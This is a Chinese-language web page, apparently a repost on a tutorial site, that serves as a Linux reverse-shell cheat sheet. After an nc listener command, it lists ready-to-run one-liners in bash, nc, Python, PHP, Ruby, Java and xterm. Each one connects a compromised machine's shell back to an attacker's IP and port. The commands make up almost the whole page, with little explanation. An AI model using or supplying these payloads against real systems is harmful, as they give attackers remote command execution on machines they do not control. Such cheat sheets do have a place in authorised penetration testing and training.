栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

linux反弹shell

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

linux反弹shell

使用nc对本地端口监听
nc -lvnp 8888

1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1 
bash -c "bash -i >& /dev/tcp/192.168.0.189/6666 0>&1"
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444 

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
3.python
import socket,subprocess,os 
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
s.connect(( "192.168.2.130" , 4444 )) 
os.dup2(s.fileno(), 0 ) 
os.dup2(s.fileno(), 1 ) 
os.dup2(s.fileno(), 2 ) 
p = subprocess.call([ "/bin/bash" , "-i" ])

python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1
“,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([”/bin/sh”,"-i"]);’

4.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
5.ruby反弹shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
6.Java反弹shell
r = Runtime.getRuntime() 
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) 
p.waitFor()
7.xterm反弹shell
反弹shell最简单的形式之一就是xterm会话,应在服务器上运行以下命令.它将尝试TCP端口6001上连接你的(10.0.0.1)
 
xterm -display 10.0.0.1:1
 
传入xterm,启动X-Server(1-监听TCP 6001).一种方法使用Xnest(在你系统上运行)
 
Xnest:1
 
你需要在授权目标上连接你
 
xhost + targetip
xterm -display 10.0.0.1:1
转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/743699.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号